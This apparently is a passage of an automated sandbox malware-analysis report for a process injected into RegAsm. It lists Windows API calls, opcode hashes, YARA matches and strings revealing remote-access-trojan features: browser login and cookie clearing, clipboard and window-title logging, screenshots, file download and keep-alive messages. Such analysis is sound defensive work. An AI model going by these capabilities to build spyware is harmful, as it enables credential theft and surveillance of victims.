                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                • __freea.LIBCMT ref: 100087D5
                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                • String ID:
                                                • API String ID: 2652629310-0
                                                • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                APIs
                                                Strings
                                                • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                • Cleared browsers logins and cookies., xrefs: 0040C130
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                • API String ID: 3472027048-1236744412
                                                • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                APIs
                                                • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                                • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                                • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                                • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DisplayEnum$Devices$Monitors
                                                • String ID:
                                                • API String ID: 1432082543-0
                                                • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                                                • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                                                APIs
                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: File$CloseHandleReadSize
                                                • String ID:
                                                • API String ID: 3642004256-0
                                                • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                APIs
                                                  • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                  • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                  • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
                                                • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                • Sleep.KERNEL32(00000064), ref: 0040A638
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Window$SleepText$ForegroundLength
                                                • String ID: [ $ ]
                                                • API String ID: 3309952895-93608704
                                                • Opcode ID: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                                                • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                • Opcode Fuzzy Hash: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                                                • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: SystemTimes$Sleep__aulldiv
                                                • String ID:
                                                • API String ID: 188215759-0
                                                • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                                • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                APIs
                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandleOpenProcess
                                                • String ID:
                                                • API String ID: 39102293-0
                                                • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                APIs
                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                  • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                • String ID:
                                                • API String ID: 2633735394-0
                                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                APIs
                                                • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
                                                • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
                                                • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
                                                • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MetricsSystem
                                                • String ID:
                                                • API String ID: 4116985748-0
                                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                APIs
                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                  • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                • String ID:
                                                • API String ID: 1761009282-0
                                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorHandling__start
                                                • String ID: pow
                                                • API String ID: 3213639722-2276729525
                                                • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                APIs
                                                • _free.LIBCMT ref: 1000655C
                                                  • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                  • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                  • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                • String ID: *?$.
                                                • API String ID: 2667617558-3972193922
                                                • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                APIs
                                                • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                                                  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                  • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                • String ID: image/jpeg
                                                • API String ID: 1291196975-3785015651
                                                • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                                • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                                APIs
                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Init_thread_footer__onexit
                                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                                • API String ID: 1881088180-3686566968
                                                • Opcode ID: 0ad70d16419787131355c48921a2e9415c0e2ce86788bdce81e29916b0442688
                                                • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                • Opcode Fuzzy Hash: 0ad70d16419787131355c48921a2e9415c0e2ce86788bdce81e29916b0442688
                                                • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                APIs
                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: ACP$OCP
                                                • API String ID: 0-711371036
                                                • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                APIs
                                                • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
                                                  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
                                                  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                  • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                • String ID: image/png
                                                • API String ID: 1291196975-2966254431
                                                • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                                • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                                APIs
                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                Strings
                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LocalTime
                                                • String ID: KeepAlive | Enabled | Timeout:
                                                • API String ID: 481472006-1507639952
                                                • Opcode ID: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
                                                • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                • Opcode Fuzzy Hash: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
                                                • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                APIs
                                                • Sleep.KERNEL32 ref: 0041667B
                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DownloadFileSleep
                                                • String ID: !D@
                                                • API String ID: 1931167962-604454484
                                                • Opcode ID: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                • Opcode Fuzzy Hash: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _strlen
                                                • String ID: : $Se.
                                                • API String ID: 4218353326-4089948878
                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
